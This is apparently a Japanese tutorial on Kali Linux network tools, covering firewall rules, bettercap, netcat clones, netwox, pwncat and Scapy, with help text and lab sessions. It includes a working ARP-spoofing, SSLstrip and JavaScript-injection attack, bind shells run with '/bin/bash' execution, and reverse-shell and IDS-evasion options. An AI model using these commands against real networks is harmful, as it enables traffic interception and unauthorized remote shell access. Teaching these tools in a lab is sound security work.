root@kali:~# freport ftest.log ftestd.log
Authorized packets:
-------------------
Modified packets (probably NAT):
--------------------------------
1 - 192.168.11.3:12345 > 192.168.65.3:80 S TCP 0
2 - 192.168.11.3:12345 > 192.168.65.3:443 S TCP 0
5 - 192.168.11.3:12345 > 192.168.65.3:22 S TCP 0
9 - 192.168.11.3:80 > 192.168.0.3:12345 PA TCP
>>>>>>>>
1 - 192.168.0.1:12345 > 192.168.0.3:80 S TCP 0
2 - 192.168.0.1:12345 > 192.168.0.3:443 S TCP 0
5 - 192.168.0.1:12345 > 192.168.0.3:22 S TCP 0
9 - 192.168.11.3:80 > 192.168.0.3:12345 PA TCP 0
Filtered or dropped packets:
----------------------------
3 - 192.168.11.3:12345 > 192.168.65.3:20 S TCP 0
4 - 192.168.11.3:12345 > 192.168.65.3:21 S TCP 0
6 - 192.168.11.3:12345 > 192.168.65.3:23 S TCP 0
7 - 192.168.11.3:12345 > 192.168.65.3:24 S TCP 0
8 - 192.168.11.3:12345 > 192.168.65.3:25 S TCP 0
Firewall Builder
ファイアウォールのルールをGUIで作成・コンパイル/インストールします。以下の製品に対応しています。
- iptables
- ipfw
- ipfilter
- PF
- Cisco ASA/PIX/FWSM
- Cisco router ACL
- Juniper Junos ACL
■ 使用例
root@kali:~# fwbuilder
Firewall Builder GUI 5.3.7
GUIでiptablesのルールを作成
コンパイルを実行すると保存先に<任意のファイル名>.fwという起動スクリプトが作成されるため、それを手動でサーバーに配置もしくはGUIからインストールコマンド(SCP)でサーバーに配置します。
# スクリプト実行前(ルール未設定)
root@kali:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
# スクリプト実行(起動)
root@kali:~# /etc/init.d/kali.fw start
Activating firewall script generated Wed Oct 9 05:08:38 2024 by root
Running prolog script
[...]
# 設定が反映されている
root@kali:~# iptables -L
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
In_RULE_0 tcp -- 192.168.11.4 anywhere tcp dpt:ssh
In_RULE_1 tcp -- anywhere anywhere tcp dpt:ssh
Chain FORWARD (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
In_RULE_0 tcp -- 192.168.11.4 anywhere tcp dpt:ssh
In_RULE_1 tcp -- anywhere anywhere tcp dpt:ssh
Chain OUTPUT (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
Chain In_RULE_0 (2 references)
target prot opt source destination
LOG all -- anywhere anywhere LOG level info prefix "RULE 0 -- CUSTOM "
ACCEPT all -- anywhere anywhere
Chain In_RULE_1 (2 references)
target prot opt source destination
LOG all -- anywhere anywhere LOG level info prefix "RULE 1 -- DENY "
DROP all -- anywhere anywhere
# スクリプト実行(停止)
root@kali:~# /etc/init.d/kali.fw stop
# 設定がリセットされている
root@kali:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Multi-purpose Toolkit
bettercap
IPv4/IPv6ネットワーク、Wi-Fiネットワーク、BLEデバイスなど、複数のターゲットに対して偵察や攻撃を行うためのネットワークセキュリティフレームワークです。
■ 使用方法
root@kali:~# bettercap --help
Usage of bettercap:
-autostart string
Comma separated list of modules to auto start. (default "events.stream")
-caplet string
Read commands from this file and execute them in the interactive session.
-caplets-path string
Specify an alternative base path for caplets.
-cpu-profile file
Write cpu profile file.
-debug
Print debug messages.
-env-file string
Load environment variables from this file if found, set to empty to disable environment persistence.
-eval string
Run one or more commands separated by ; in the interactive session, used to set variables via command line.
-gateway-override string
Use the provided IP address instead of the default gateway. If not specified or invalid, the default gateway will be used.
-iface string
Network interface to bind to, if empty the default interface will be auto selected.
-mem-profile file
Write memory profile to file.
-no-colors
Disable output color effects.
-no-history
Disable interactive session history file.
-pcap-buf-size int
PCAP buffer size, leave to 0 for the default value. (default -1)
-script string
Load a session script.
-silent
Suppress all logs which are not errors.
-version
Print the version and exit.
■ 使用例
# 攻撃者ホストでbettercapを起動
root@kali_1:~# bettercap
192.168.0.0/16 > 192.168.11.3 » [03:33:17] [sys.log] [inf] gateway monitor started ...
# ネットワーク上のホストの探索
192.168.0.0/16 > 192.168.11.3 » net.recon on
192.168.0.0/16 > 192.168.11.3 » [07:01:21] [endpoint.new] endpoint 192.168.11.4 detected as 02:42:ac:12:00:04.
# HTTPプロキシを起動(レスポンスにJavaScriptのコードを挿入する)
192.168.0.0/16 > 192.168.11.3 » set http.proxy.injectjs alert("Hello World")
192.168.0.0/16 > 192.168.11.3 » set http.proxy.sslstrip true
192.168.0.0/16 > 192.168.11.3 » http.proxy on
192.168.0.0/16 > 192.168.11.3 » [07:01:46] [sys.log] [inf] http.proxy started on 192.168.11.3:8080 (sslstrip enabled)
# 標的ホストに対してARPスプーフィングを実行
192.168.0.0/16 > 192.168.11.3 » set arp.spoof.targets 192.168.11.4
192.168.0.0/16 > 192.168.11.3 » set arp.spoof.fullduplex true
192.168.0.0/16 > 192.168.11.3 » arp.spoof on
192.168.0.0/16 > 192.168.11.3 » [07:02:02] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
192.168.0.0/16 > 192.168.11.3 » [07:02:02] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
# HTTPプロキシ起動時にiptablesに自動的にルールが追加される
root@kali_1:~# iptables -t nat -L PREROUTING
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere anywhere tcp dpt:http to:192.168.11.3:8080
# 標的ホストで外部サイトにHTTPリクエストを送信
# ARPスプーフィングにより攻撃者ホストのHTTPプロキシに経由されSSLStripでHTTPSリクエストに差し替えられ、外部サイトからのレスポンスにJavaScriptコードが埋め込まれる
root@kali_2:~# curl -L http://qiita.com
[...]
<noscript><link crossorigin="anonymous" href="http://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha512-SfTiTlX6kk+qitfevl/7LibUOeJWlt9rbyDn92a1DqWOw9vWG2MFoays0sgObmWazO5BQPiFucnnEAjpAB+/Sw==" referrerpolicy="no-referrer" rel="stylesheet" /></noscript>
<script type="text/javascript">alert(Hello World)</script>
</head>
[...]
root@kali_1:~# bettercap
[...]
192.168.0.0/16 > 192.168.11.3 » [07:02:02] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
192.168.0.0/16 > 192.168.11.3 » [07:02:18] [sys.log] [inf] [sslstrip] Got redirection from HTTP to HTTPS: http://qiita.com -> https://qiita.com
192.168.0.0/16 > 192.168.11.3 » [07:02:18] [sys.log] [inf] http.proxy > injecting javascript (65 bytes) into qiita.com/ (167 bytes) for 192.168.11.4
192.168.0.0/16 > 192.168.11.3 » [07:02:18] [sys.log] [inf] [sslstrip] Replacing host qiita.com with qiita.com in request from 192.168.11.4:44038 and transmitting HTTPS
192.168.0.0/16 > 192.168.11.3 » [07:02:19] [sys.log] [inf] [sslstrip] Stripping 65 SSL links from qiita.com
192.168.0.0/16 > 192.168.11.3 » [07:02:19] [sys.log] [inf] [sslstrip] Fixing cookies on qiita.com
192.168.0.0/16 > 192.168.11.3 » [07:02:19] [sys.log] [inf] http.proxy > injecting javascript (65 bytes) into qiita.com/ (290066 bytes) for 192.168.11.4
Cryptcat
netcatにTwofish暗号化を組み込んだnetcatのクローンです。
■ 使用方法
root@kali:~# cryptcat -h
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]
■ 使用例
# ホスト1をリッスンモードで起動(シークレットパスワードhello)
root@kali_1:~# cryptcat -k hello -l -p 4444
# ホスト2からホスト1へデータを送信
root@kali_2:~# cryptcat -k hello 192.168.11.3 4444
hello
# 通信内容が暗号化されている
root@kali_1:~# tcpdump -n -A -i eth0
06:08:53.194279 IP 192.168.11.4.51566 > 192.168.11.3.4444: Flags [P.], seq 221508907:221508923, ack 2778846694, win 502, options [nop,nop,TS val 1303472439 ecr 1186926670], length 16
E..D.)@.@..a.........n.\.3.+........X`.....
M.i7F..NH.(..<o`..s.i
W`
# netcatの場合は平文で送信されている
root@kali_1:~# tcpdump -n -A -i eth0
06:10:20.289697 IP 192.168.11.4.42856 > 192.168.11.3.4444: Flags [P.], seq 2016164085:2016164091, ack 3696696589, win 502, options [nop,nop,TS val 1303559539 ecr 1187034921], length 6
E..:,.@.@............h.\x,8..W......XV.....
M..sF..)hello
dbd
netcatにAES-CBC-128 + HMAC-SHA1暗号化を組み込んだnetcatのクローンです。
■ 使用方法
root@kali:~# dbd -h
connect (tcp): dbd [-options] host port
listen (tcp): dbd -l -p port [-options]
options:
-l listen for incoming connection
-p n choose port to listen on, or source port to connect out from
-a address choose an address to listen on or connect out from
-e prog program to execute after connect (e.g. -e cmd.exe or -e bash)
-r n infinitely respawn/reconnect, pause for n seconds between
connection attempts. -r0 can be used to re-listen after
disconnect (just like a regular daemon)
-c on|off encryption on/off. specify whether you want to use the built-in
AES-CBC-128 + HMAC-SHA1 encryption implementation (by
Christophe Devine - http://www.cr0.net:8040/) or not
default is: -c on
-k secret override default phrase to use for encryption (secret must be
shared between client and server)
-q hush, quiet, don\'t print anything (overrides -v)
-v be verbose
-n toggle numeric-only IP addresses (don\'t do DNS resolution). if
you specify -n twice, original state will be active (i.e. -n
works like a on/off switch)
-m toggle monitoring (snooping) on/off (only used with the -e
option). snooping can also be turned on by specifying -vv (-v
two times)
-P prefix add prefix (+ a hardcoded separator) to all outbound data.
this option is mostly only useful for dbd in "chat mode" (to
prefix lines you send with your nickname)
-H on|off highlight incoming data with a hardcoded (color) escape
sequence (for e.g. chatting). default is: -H off
-V print version banner and exit (include that output in your
bug report and send bug report to michel.blomgren@tigerteam.se)
unix-like OS specific options:
-s invoke a shell, nothing else. if dbd is setuid 0, it\'ll invoke
a root shell
-w n "immobility timeout" in seconds for idle read/write operations
and program execution (the -e option)
-D on|off fork and run in background (daemonize). default: -D off
■ 使用例
# ホスト1をリッスンモードで起動(シークレットパスワードhello)
root@kali_1:~# dbd -k hello -l -p 4444
# ホスト2からホスト1へデータを送信
root@kali_2:~# dbd -k hello 192.168.11.3 4444
hello
# 通信内容が暗号化されている
root@kali_1:~# tcpdump -n -A -i eth0
07:07:13.657017 IP 192.168.11.4.47676 > 192.168.11.3.4444: Flags [P.], seq 401500837:401500873, ack 2018669106, win 502, options [nop,nop,TS val 1306973150 ecr 1190446901], length 36
E..X.9@.@.2=.........<.\..j.xRr2....Xt.....
M...F..5.8c..(.d...F._F..&.v[....(.....^1n.:
# netcatの場合は平文で送信されている
root@kali_1:~# tcpdump -n -A -i eth0
07:08:32.684187 IP 192.168.11.4.53998 > 192.168.11.3.4444: Flags [P.], seq 2097202315:2097202321, ack 1718728373, win 502, options [nop,nop,TS val 1307052182 ecr 1190526777], length 6
E..:;.@.@.. ...........\}...fq......XV.....
M...F..9hello
Ncat
netcatの機能を強化したネットワークツールです。チェーン接続、TCPとUDPポートの両方を他のサイトにリダイレクト、SSLサポート、SOCKS4またはHTTPプロキシ経由のプロキシ接続などの機能を備えています。
■ 使用方法
root@kali:~# ncat --help
Usage: ncat [options] [hostname] [port]
Options taking a time assume seconds. Append 'ms' for milliseconds,
's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms).
-4 Use IPv4 only
-6 Use IPv6 only
-U, --unixsock Use Unix domain sockets only
--vsock Use vsock sockets only
-C, --crlf Use CRLF for EOL sequence
-c, --sh-exec <command> Executes the given command via /bin/sh
-e, --exec <command> Executes the given command
--lua-exec <filename> Executes the given Lua script
-g hop1[,hop2,...] Loose source routing hop points (8 max)
-G <n> Loose source routing hop pointer (4, 8, 12, ...)
-m, --max-conns <n> Maximum <n> simultaneous connections
-h, --help Display this help screen
-d, --delay <time> Wait between read/writes
-o, --output <filename> Dump session data to a file
-x, --hex-dump <filename> Dump session data as hex to a file
-i, --idle-timeout <time> Idle read/write timeout
-p, --source-port port Specify source port to use
-s, --source addr Specify source address to use (doesn\'t affect -l)
-l, --listen Bind and listen for incoming connections
-k, --keep-open Accept multiple connections in listen mode
-n, --nodns Do not resolve hostnames via DNS
-t, --telnet Answer Telnet negotiations
-u, --udp Use UDP instead of default TCP
--sctp Use SCTP instead of default TCP
-v, --verbose Set verbosity level (can be used several times)
-w, --wait <time> Connect timeout
-z Zero-I/O mode, report connection status only
--append-output Append rather than clobber specified output files
--send-only Only send data, ignoring received; quit on EOF
--recv-only Only receive data, never send anything
--no-shutdown Continue half-duplex when receiving EOF on stdin
--allow Allow only given hosts to connect to Ncat
--allowfile A file of hosts allowed to connect to Ncat
--deny Deny given hosts from connecting to Ncat
--denyfile A file of hosts denied from connecting to Ncat
--broker Enable Ncat\'s connection brokering mode
--chat Start a simple Ncat chat server
--proxy <addr[:port]> Specify address of host to proxy through
--proxy-type <type> Specify proxy type ("http", "socks4", "socks5")
--proxy-auth <auth> Authenticate with HTTP or SOCKS proxy server
--proxy-dns <type> Specify where to resolve proxy destination
--ssl Connect or listen with SSL
--ssl-cert Specify SSL certificate file (PEM) for listening
--ssl-key Specify SSL private key (PEM) for listening
--ssl-verify Verify trust and domain name of certificates
--ssl-trustfile PEM file containing trusted SSL certificates
--ssl-ciphers Cipherlist containing SSL ciphers to use
--ssl-servername Request distinct server name (SNI)
--ssl-alpn ALPN protocol list to use
--version Display Ncat\'s version information and exit
■ 使用例
# SMTPサーバーに接続して対話を行う
root@kali:~# ncat 192.168.11.4 25
220 server4test.localdomain ESMTP Postfix (Ubuntu)
VRFY hello@localhost
252 2.0.0 hello@localhost
QUIT
221 2.0.0 Bye
# ホストAで8081番ポートを使ってコマンドを待ち受ける
root@kali_a:~# ncat --exec "/bin/bash" -l 8081 --keep-open
# ホストBからホストAの8081番ポートに接続してコマンドを送信
root@kali_b:~# ncat 192.168.11.4 8081
hostname
kali_a
# ホストAをリッスン状態で待機し受信したデータをファイルに出力する
root@kali_a:~# ncat -l > hello.txt
# ホストBからホストAに対してファイルを送信
root@kali_b:~# ncat --send-only 192.168.11.3 < hello.txt
netwox
200種類を超えるネットワーク関連のユーティリティツールを提供します。ツールの分類は以下の通りです。
- information
- network protocol
- application protocol
- sniff (capture network packets)
- spoof (create and send packets)
- record (file containing captured packets)
- client
- server
- ping (check if a computer if reachable)
- traceroute (obtain list of gateways)
- scan (computer and port discovery)
- network audit
- brute force (check if passwords are weak)
- remote administration
- tools not related to network
■ 使用方法
root@kali:~# man netwox
SYNOPSIS
netwox number [ parameters... ]
netwox number --help
netwox number --help2
netwox
DESCRIPTION
number number of the tool to use
parameters
parameters for the chosen tool number. Parameter --help shows help. Parameter --help2 shows description.
When using netwox without number and parameters, it enters interactive help mode. In this mode, the user has to select a category by
pressing a key. Then by choosing a tool number, its corresponding usage is displayed. Note: netwag is easier than interactive help mode.
■ 使用例
# インタラクティブモードで起動
root@kali:~# netwox
######################## MAIN MENU #########################
[...]
a + information
b + network protocol
c + application protocol
d + sniff (capture network packets)
e + spoof (create and send packets)
f + record (file containing captured packets)
g + client
h + server
i + ping (check if a computer if reachable)
j + traceroute (obtain list of gateways)
k + scan (computer and port discovery)
l + network audit
m + brute force (check if passwords are weak)
n + remote administration
o + tools not related to network
Select a node (key in 03456abcdefghijklmno): g
########################## client ##########################
[...]
a + UDP client
b + TCP client
Select a node (key in 0123456ab): b
######################## TCP client ########################
[...]
a + generic TCP client
b + DNS (tcp) client
c + FTP client
d + HTTP client
e + IDENT client
f + IRC client
g + NNTP client
h + SMB client
i + SMTP client
j + TELNET client
k + WHOIS client
Select a node (key in 0123456abcdefghijk): h
######################## SMB client ########################
[...]
a - 198:SMB/CIFS client: list shares
b - 199:SMB/CIFS client: create a directory
c - 200:SMB/CIFS client: delete a directory
d - 201:SMB/CIFS client: rename a directory
e - 202:SMB/CIFS client: list contents of a directory
f - 203:SMB/CIFS client: delete a file
g - 204:SMB/CIFS client: rename a file
h - 205:SMB/CIFS client: get a file
i - 206:SMB/CIFS client: put a file
j - 207:SMB/CIFS client: recursively get a directory
k - 208:SMB/CIFS client: recursively put a directory
l - 209:SMB/CIFS client: recursively delete a directory
Select a node (key in 0123456abcdefghijkl): a
################# help for tool number 198 #################
Title: SMB/CIFS client: list shares
[...]
Synonyms: smbclient
Usage: netwox 198 -i ip [-u login] [-w password] [-N netbiosname] [-d device] [-E eth] [-e eth] [-I ip] [-P port] [-p port] [-o ip4opts] [-O ip6exts] [-v uint32] [-T uint32] [-V|+V] [-D|+D]
Parameters:
-i|--dst-ip ip destination IP address {5.6.7.8}
-u|--user login username
-w|--password password password
-N|--netbiosname netbiosname server NetBIOS NAME
-d|--device device device name {Eth0}
-E|--src-eth eth source ethernet address {0:2:3:4:5:6}
-e|--dst-eth eth destination ethernet address {0:8:9:a:b:c}
-I|--src-ip ip source IP address {192.168.11.3}
-P|--src-port port source port number {0}
-p|--dst-port port destination port number {139}
-o|--ip4opts ip4opts IPv4 options
-O|--ip6exts ip6exts IPv6 extensions
-v|--authversion uint32 0=Lanman, 1=NTLMv1, 2=NTLMv2, unset=best {2}
-T|--timeout uint32 timeout in milliseconds {60000}
-V|--verbose|+V|--no-verbose display SMB trace
-D|--debug|+D|--no-debug display SMB packets
Example: netwox 198 -i "5.6.7.8"
Example: netwox 198 --dst-ip "5.6.7.8"
Press 'r' or 'k' to run this tool, or any other key to continue
netwox 198 -i 192.168.11.4 -u hello -w hello
share=print$
comment=Printer Drivers
sharetype=0
share=tmp
comment=oh noes!
sharetype=0
share=opt
comment=
sharetype=0
share=IPC$
comment=IPC Service (b776fbd9255f server (Samba 3.0.20-Debian))
sharetype=3
share=ADMIN$
comment=IPC Service (b776fbd9255f server (Samba 3.0.20-Debian))
sharetype=3
share=hello
comment=Home Directories
sharetype=0
Command returned 0 (OK)
pwncat
Netcatの機能を強化したネットワークツールです。バインド&リバースシェル、自己注入シェル、ポート転送などの機能を備えています。
■ 使用方法
root@kali:~# pwncat --help
usage: pwncat [options] hostname port
pwncat [options] -l [hostname] port
pwncat [options] -z hostname port
pwncat [options] -L [addr:]port hostname port
pwncat [options] -R addr:port hostname port
pwncat -V, --version
pwncat -h, --help
positional arguments:
hostname Address to listen, forward, scan or connect to.
port [All modes]
Single port to listen, forward or connect to.
[Zero-I/O mode]
Specify multiple ports to scan:
Via list: 4444,4445,4446
Via range: 4444-4446
Via incr: 4444+2
mode arguments:
-l, --listen [Listen mode]:
Start a server and listen for incoming connections.
If using TCP and a connected client disconnects or the
connection is interrupted otherwise, the server will
quit. See -k/--keep-open to change this behaviour.
-z, --zero [Zero-I/0 mode]:
Connect to a remote endpoint and report status only.
Used for port scanning.
See --banner for version detection.
-L [addr:]port, --local [addr:]port
[Local forward mode]:
This mode will start a server and a client internally.
The internal server will listen locally on specified
addr/port (given by --local [addr:]port).
The server will then forward traffic to the internal
client which connects to another server specified by
hostname/port given via positional arguments.
(I.e.: proxies a remote service to a local address)
-R addr:port, --remote addr:port
[Remote forward mode]:
This mode will start two clients internally. One is
connecting to the target and one is connecting to
another pwncat/netcat server you have started some-
where. Once connected, it will then proxy traffic
between you and the target.
This mode should be applied on machines that block
incoming traffic and only allow outbound.
The connection to your listening server is given by
-R/--remote addr:port and the connection to the
target machine via the positional arguments.
optional arguments:
-e cmd, --exec cmd Execute shell command. Only for connect or listen mode.
-C lf, --crlf lf Specify, 'lf', 'crlf' or 'cr' to always force replacing
line endings for input and outout accordingly. Specify
'no' to completely remove any line feeds. By default
it will not replace anything and takes what is entered
(usually CRLF on Windows, LF on Linux and some times
CR on MacOS).
-n, --nodns Do not resolve DNS.
--send-on-eof Buffer data received on stdin until EOF and send
everything in one chunk.
--no-shutdown Do not shutdown into half-duplex mode.
If this option is passed, pwncat won\'t invoke shutdown
on a socket after seeing EOF on stdin. This is provided
for backward-compatibility with OpenBSD netcat, which
exhibits this behavior.
-v, --verbose Be verbose and print info to stderr. Use -v, -vv, -vvv
or -vvvv for more verbosity. The server performance will
decrease drastically if you use more than three times.
--info type Show additional info about sockets, IPv4/6 or TCP opts
applied to the current socket connection. Valid
parameter are 'sock', 'ipv4', 'ipv6', 'tcp' or 'all'.
Note, you must at least be in INFO verbose mode in order
to see them (-vv).
-c str, --color str Colored log output. Specify 'always', 'never' or 'auto'.
In 'auto' mode, color is displayed as long as the output
goes to a terminal. If it is piped into a file, color
will automatically be disabled. This mode also disables
color on Windows by default. (default: auto)
--safe-word str All modes:
If pwncat is started with this argument, it will shut
down as soon as it receives the specified string. The
--keep-open (server) or --reconn (client) options will
be ignored and it won\'t listen again or reconnect to you.
Use a very unique string to not have it shut down
accidentally by other input.
protocol arguments:
-4 Only Use IPv4 (default: IPv4 and IPv6 dualstack).
-6 Only Use IPv6 (default: IPv4 and IPv6 dualstack).
-u, --udp Use UDP for the connection instead of TCP.
-T str, --tos str Specifies IP Type of Service (ToS) for the connection.
Valid values are the tokens 'mincost', 'lowcost',
'reliability', 'throughput' or 'lowdelay'.
--http Connect / Listen mode (TCP and UDP):
Hide traffic in http packets to fool Firewalls/IDS/IPS.
--https Connect / Listen mode (TCP and UDP):
Hide traffic in https packets to fool Firewalls/IDS/IPS.
-H [str ...], --header [str ...]
Add HTTP headers to your request when using --http(s).
command & control arguments:
--self-inject cmd:host:port[s]
Listen mode (TCP only):
If you are about to inject a reverse shell onto the
victim machine (via php, bash, nc, ncat or similar),
start your listening server with this argument.
This will then (as soon as the reverse shell connects)
automatically deploy and background-run an unbreakable
pwncat reverse shell onto the victim machine which then
also connects back to you with specified arguments.
Example: '--self-inject /bin/bash:10.0.0.1:4444'
It is also possible to launch multiple reverse shells by
specifying multiple ports.
Via list: --self-inject /bin/sh:10.0.0.1:4444,4445,4446
Via range: --self-inject /bin/sh:10.0.0.1:4444-4446
Via incr: --self-inject /bin/sh:10.0.0.1:4444+2
Note: this is currently an experimental feature and does
not work on Windows remote hosts yet.
pwncat scripting engine:
--script-send file All modes (TCP and UDP):
A Python scripting engine to define your own custom
transformer function which will be executed before
sending data to a remote endpoint. Your file must
contain the exact following function which will:
be applied as the transformer:
def transform(data, pse):
# NOTE: the function name must be 'transform'
# NOTE: the function param name must be 'data'
# NOTE: indentation must be 4 spaces
# ... your transformations goes here
return data
You can also define as many custom functions or classes
within this file, but ensure to prefix them uniquely to
not collide with pwncat\'s function or classes, as the
file will be called with exec().
--script-recv file All modes (TCP and UDP):
A Python scripting engine to define your own custom
transformer function which will be executed after
receiving data from a remote endpoint. Your file must
contain the exact following function which will:
be applied as the transformer:
def transform(data, pse):
# NOTE: the function name must be 'transform'
# NOTE: the function param name must be 'data'
# NOTE: indentation must be 4 spaces
# ... your transformations goes here
return data
You can also define as many custom functions or classes
within this file, but ensure to prefix them uniquely to
not collide with pwncat\'s function or classes, as the
file will be called with exec().
zero-i/o mode arguments:
--banner Zero-I/O (TCP and UDP):
Try banner grabbing during port scan.
listen mode arguments:
-k, --keep-open Listen mode (TCP only):
Re-accept new clients in listen mode after a client has
disconnected or the connection is interrupted otherwise.
(default: server will quit after connection is gone)
--rebind [x] Listen mode (TCP and UDP):
If the server is unable to bind, it will re-initialize
itself x many times before giving up. Omit the
quantifier to rebind endlessly or specify a positive
integer for how many times to rebind before giving up.
See --rebind-robin for an interesting use-case.
(default: fail after first unsuccessful try).
--rebind-wait s Listen mode (TCP and UDP):
Wait x seconds between re-initialization. (default: 1)
--rebind-robin port Listen mode (TCP and UDP):
If the server is unable to initialize (e.g: cannot bind
and --rebind is specified, it it will shuffle ports in
round-robin mode to bind to.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Set --rebind to at least the number of ports to probe +1
This option requires --rebind to be specified.
connect mode arguments:
--source-addr addr Specify source bind IP address for connect mode.
--source-port port Specify source bind port for connect mode.
--reconn [x] Connect mode (TCP and UDP):
If the remote server is not reachable or the connection
is interrupted, the client will connect again x many
times before giving up. Omit the quantifier to retry
endlessly or specify a positive integer for how many
times to retry before giving up.
(default: quit if the remote is not available or the
connection was interrupted)
This might be handy for stable TCP reverse shells ;-)
Note on UDP:
By default UDP does not know if it is connected, so
it will stop at the first port and assume it has a
connection. Consider using --udp-sconnect with this
option to make UDP aware of a successful connection.
--reconn-wait s Connect mode (TCP and UDP):
Wait x seconds between re-connects. (default: 1)
--reconn-robin port Connect mode (TCP and UDP):
If the remote server is not reachable or the connection
is interrupted and --reconn is specified, the client
will shuffle ports in round-robin mode to connect to.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Set --reconn to at least the number of ports to probe +1
This helps reverse shell to evade intrusiona prevention
systems that will cut your connection and block the
outbound port.
This is also useful in Connect or Zero-I/O mode to
figure out what outbound ports are allowed.
--ping-init Connect mode (TCP and UDP):
UDP is a stateless protocol unlike TCP, so no hand-
shake communication takes place and the client just
sends data to a server without being "accepted" by
the server first.
This means a server waiting for an UDP client to
connect to, is unable to send any data to the client,
before the client hasn't send data first. The server
simply doesn't know the IP address before an initial
connect.
The --ping-init option instructs the client to send one
single initial ping packet to the server, so that it is
able to talk to the client.
This is a way to make a UDP reverse shell work.
See --ping-word for what char/string to send as initial
ping packet (default: '\0')
--ping-intvl s Connect mode (TCP and UDP):
Instruct the client to send ping intervalls every s sec.
This allows you to restart your UDP server and just wait
for the client to report back in. This might be handy
for stable UDP reverse shells ;-)
See --ping-word for what char/string to send as initial
ping packet (default: '\0')
--ping-word str Connect mode (TCP and UDP):
Change the default character '\0' to use for upd ping.
Single character or strings are supported.
--ping-robin port Connect mode (TCP and UDP):
Instruct the client to shuffle the specified ports in
round-robin mode for a remote server to ping.
This might be handy to scan outbound allowed ports.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Use --ping-intvl 0 to be faster.
--udp-sconnect Connect mode (UDP only):
Emulating stateful behaviour for UDP connect phase by
sending an initial packet to the server to validate if
it is actually connected.
By default, UDP will simply issue a connect and is not
aware if it is really connected or not.
The default connect packet to be send is '\0', you
can change this with --udp-sconnect-word.
--udp-sconnect-word [str]
Connect mode (UDP only):
Change the the data to be send for UDP stateful connect
behaviour. Note you can also omit the string to send an
empty packet (EOF), but be aware that some servers such
as netcat will instantly quit upon receive of an EOF
packet.
The default is to send a null byte sting: '\0'.
misc arguments:
-h, --help Show this help message and exit
-V, --version Show version information and exit
■ 使用例
# バインドシェル
# 標的ホストでリスナーをオープン
root@kali_2:~# pwncat -l -e '/bin/bash' 8081
# 標的ホストに接続してコマンドを実行
root@kali_1:~# pwncat 192.168.11.4 8081
hostname
kali_2
# ポートフォワーディング
# 3307番ポートでの接続をDBサーバーにフォワーディング
root@kali_2:~# pwncat -L 3307 192.168.56.3 3306
# MySQLクライアントから接続
root@kali_1:~# mysql -u root -h 192.168.11.4 -P 3307
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.001 sec)
Scapy
対話型のパケット操作ツールです。スキャン、トレースルーティング、プローブ、攻撃、ネットワーク検出など様々なタスクを処理することができます。
■ 使用方法
root@kali:~# scapy -H
Welcome to Scapy (2.6.0) using IPython 8.20.0
>>> lsc()
IPID_count : Identify IP id values classes in a list of packets
arp_mitm : ARP MitM: poison 2 target\'s ARP cache
arpcachepoison : Poison targets\' ARP cache
arping : Send ARP who-has requests to determine which hosts are up::
arpleak : Exploit ARP leak flaws, like NetBSD-SA2017-002.
bind_layers : Bind 2 layers on some specific fields\' values.
bridge_and_sniff : Forward traffic between interfaces if1 and if2, sniff and return
chexdump : Build a per byte hexadecimal representation
computeNIGroupAddr : Compute the NI group Address. Can take a FQDN as input parameter
connect_from_ip : Open a TCP socket to a host:port while spoofing another IP.
corrupt_bits : Flip a given percentage (at least one bit) or number of bits
corrupt_bytes : Corrupt a given percentage (at least one byte) or number of bytes
dclocator : Perform a DC Locator as per [MS-ADTS] sect 6.3.6 or RFC4120.
defrag : defrag(plist) -> ([not fragmented], [defragmented],
defragment : defragment(plist) -> plist defragmented as much as possible
dhcp_request : Send a DHCP discover request and return the answer.
dns_resolve : Perform a simple DNS resolution using conf.nameservers with caching
dnssd : Performs a DNS-SD (RFC6763) request
dyndns_add : Send a DNS add message to a nameserver for "name" to have a new "rdata"
dyndns_del : Send a DNS delete message to a nameserver for "name"
etherleak : Exploit Etherleak flaw
explore : Function used to discover the Scapy layers and protocols.
fletcher16_checkbytes : Calculates the Fletcher-16 checkbytes returned as 2 byte binary-string.
fletcher16_checksum : Calculates Fletcher-16 checksum of the given buffer.
fragleak : --
fragleak2 : --
fragment : Fragment a big IP datagram
fuzz : Transform a layer into a fuzzy layer by replacing some default values
getmacbyip : Returns the destination MAC address used to reach a given IP address.
getmacbyip6 : Returns the MAC address of the next hop used to reach a given IPv6 address.
hexdiff : Show differences between 2 binary strings, Packets...
hexdump : Build a tcpdump like hexadecimal view
hexedit : Run hexedit on a list of packets, then return the edited packets.
hexstr : Build a fancy tcpdump like hex from bytes.
import_hexcap : Imports a tcpdump like hexadecimal view
